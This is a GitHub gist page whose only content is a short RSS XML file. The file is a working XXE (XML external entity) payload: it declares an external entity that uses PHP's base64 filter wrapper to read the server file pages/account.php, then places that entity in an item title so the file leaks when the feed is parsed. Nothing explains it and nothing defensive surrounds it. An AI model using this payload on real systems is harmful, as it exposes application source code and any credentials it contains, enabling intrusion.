Skip to content

Instantly share code, notes, and snippets.

@npinto
Created May 22, 2026 07:00
Show Gist options
  • Select an option

  • Save npinto/e837b51abf14ac95e2d80e09d2d6af94 to your computer and use it in GitHub Desktop.

Select an option

Save npinto/e837b51abf14ac95e2d80e09d2d6af94 to your computer and use it in GitHub Desktop.
x
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=pages/account.php">
]>
<rss version="2.0">
<channel>
<title>F</title>
<link>http://x.com</link>
<description>T</description>
<item>
<title>&xxe;</title>
<link>http://x.com/1</link>
</item>
</channel>
</rss>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment